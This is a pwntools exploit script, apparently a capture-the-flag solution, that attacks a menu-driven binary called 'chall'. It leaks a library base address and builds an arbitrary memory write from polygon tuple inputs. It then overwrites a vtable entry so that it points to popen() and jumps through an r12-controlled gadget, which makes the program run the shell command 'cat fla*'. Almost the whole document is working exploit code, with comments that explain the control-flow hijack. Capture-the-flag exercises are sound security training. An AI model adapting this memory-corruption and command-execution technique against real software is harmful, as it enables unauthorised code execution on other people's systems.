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Last active March 20, 2022 13:01
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from pwn import *
def connect():
if args.REMOTE:
return remote('', 9002)
return process('./chall')
with connect() as tube:
tube.sendlineafter(b'> ', b'2')
tube.sendlineafter(b': ', b'lol')
leak = tube.recvuntil(b']\n')
start_pos = leak.find(b'0x')
end_pos = leak.find(b']', start_pos)
base_addr = int(leak[start_pos:end_pos], 16) - 0xa1e5d
tube.sendlineafter(b'> ', b'1')
tube.sendlineafter(b': ', b'lol')
tube.sendlineafter(b': ', b'3')
for _ in range(3):
tube.sendlineafter(b' = ', b'(0, 0)')
tube.sendlineafter(b'> ', b'3')
tube.sendlineafter(b': ', b'lol')
tube.sendlineafter(b': ', b'lol')
tube.sendlineafter(b': ', b'n')
def to_tuple(payload):
hi = u32(payload[0:4], sign='signed')
lo = u32(payload[4:], sign='signed')
return f'({hi}, {lo})'.encode()
def write(addr, val):
assert addr % 8 == 0
tube.sendlineafter(b'> ', b'4')
tube.sendlineafter(b': ', b'lol')
tube.sendlineafter(b': ', str(addr // 8).encode())
tube.sendlineafter(b' = ', to_tuple(val))
# a vtable entry that points to popen()
write(base_addr + 0x1681c0, p64(base_addr + 0xdd0b0))
# $rsi is the pointer to the length of the name of the polygon.
# We don't control $rdi but we control $r12, which points to the last tuple
# of the polygon. We can therefore jump into the middle of a function that
# does `mov rdi, r12`. This is enough to call popen(PAYLOAD, "w").
write(base_addr + 0x150988, p64(base_addr + 0xe5e10))
tube.sendlineafter(b'> ', b'1')
tube.sendlineafter(b': ', b'A' * ord('w'))
tube.sendlineafter(b': ', b'3')
for _ in range(3):
tube.sendlineafter(b' = ', to_tuple(b'cat fla*'))
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